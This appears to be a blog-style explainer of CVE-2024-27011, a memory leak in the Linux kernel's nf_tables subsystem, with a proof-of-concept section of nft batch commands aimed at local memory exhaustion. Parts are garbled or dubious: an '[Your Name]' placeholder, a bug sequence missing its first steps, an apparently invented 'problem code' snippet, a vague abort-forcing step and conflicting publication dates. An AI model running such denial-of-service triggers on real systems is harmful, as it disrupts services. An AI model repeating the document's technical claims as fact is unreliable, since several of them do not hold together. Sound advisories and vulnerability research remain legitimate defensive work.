Date Published: June 2024
Severity: Medium
Author: [Your Name]
Introduction
Recently assigned as CVE-2024-27011, a significant memory leak vulnerability was found and resolved in the Linux kernel's netfilter subsystem — more specifically, within nf_tables. This bug could let a user with CAP_NET_ADMIN privileges cause an unintended memory corruption or leak, enabling potential local exhaustion of kernel memory.
In this explainer, we break down the vulnerability in plain language, demonstrate its impact, and walk through proof-of-concept exploit steps. This is exclusive research and aims to make things accessible even for readers new to kernel security.
The Vulnerability: Where It Exists
nf_tables is the packet filtering and classification framework in Linux, essentially a modern replacement for iptables. One of its advanced features is *maps*, through which kernel state can be updated at runtime.
In affected kernels (notably those before Linux 6.9-rc4), the following sequence causes a reference miscount:
You delete the entire set right after.
- If this process aborts (like during transaction failure), cleanup code tries to "restore" previously deleted objects.
However, restore logic runs twice, meaning a reference count is increased erroneously.
This subtle bug leads to a memory leak: the erroneously incremented references prevent that memory from ever being freed (unless rebooted).
The root cause was addressed in this commit
- netfilter: nf_tables: fix memleak in map from abort path
When hitting the bug, you might see logs like
[ 617.286929] ------------[ cut here ]------------
[ 617.286939] WARNING: CPU: 6 PID: 790302 at net/netfilter/nf_tables_api.c:2086 nf_tables_chain_destroy+x1f7/x220 [nf_tables]
[ ... omitted for brevity ... ]
[ 617.288483] nf_tables_trans_destroy_work+x588/x590 [nf_tables]
The related kernel code in nf_tables_api.c prior to the fix handled element delete and set delete in the abort path by restoring state without checking if the reference was already returned — causing a double increment (memleak).
Problem code snippet (simplified)
if (trans->ops && trans->ops->abort)
trans->ops->abort(trans);
else
restore_element_state();
restore_set_state();
Patch highlights:
The fix is to _skip restoring_ if the next generation bit has already been cleared, avoiding a second (erroneous) reference increment.
Proof of Concept: Triggering the Leak
> Note: Requires CAP_NET_ADMIN and a kernel vulnerable to CVE-2024-27011 (Linux 6.9-rc3 or earlier).
We can use nft (the nftables CLI) to reenact the bug.
1. Create a problematic nftables configuration
nft add table inet test
nft add set inet test myset { type ipv4_addr; }
2. Add & remove elements in a transaction
nft --debug=netlink batch << EOF
add element inet test myset { 1.2.3.4 }
delete element inet test myset { 1.2.3.4 }
delete set inet test myset
EOF
3. Force an abort situation
To force the kernel abort path, you can (for example) run another operation that collides with the above, or inject netlink errors via a malicious tool. Or simply send a malformed batch:
nft batch << EOF
add set inet test badset { type inet_service; }
/* Not closing the batch, or using mismatched statements */
EOF
Now, monitor kernel logs. On affected kernels, a double refcount increment and leak will occur for the mapped element.
Impact
- Local Denial of Service (DoS): An attacker can leverage repeated allocations to slowly exhaust kernel memory, causing OOM conditions or system instability.
- Prerequisites: User must have CAP_NET_ADMIN (typical for networking apps or privileged containers/LXC).
- No privilege escalation is possible directly, but could be used to disrupt services or mask kernel memory leaks.
Remediation
Upgrade to Linux kernel 6.9-rc4 or later. All maintained stable trees have incorporated the fix as of early June 2024.
- Upstream commit reference
- Debian Security Tracker
Remove CAP_NET_ADMIN from untrusted users and containers, and monitor for excessive kernel memory usage on unpatched hosts.
References
- nftables project
- CVE-2024-27011 (NVD)
- Original Linux kernel patch commit
- Example kernel crash log
Conclusion
CVE-2024-27011 is a nuanced memleak in the Linux nf_tables code affecting kernels before 6.9-rc4, allowing privileged users to cause persistent kernel memory leaks. While it doesn't allow privilege escalation or remote code execution, administrators should patch promptly to avoid possible DoS from local actors.
If you want to contribute a more robust local exploit, or see the bug in action on pre-patched kernels, examine the abort paths in nftables and look at netlink transaction rollbacks!
Timeline
Published on: 05/01/2024 06:15:19 UTC
Last modified on: 12/23/2024 14:06:38 UTC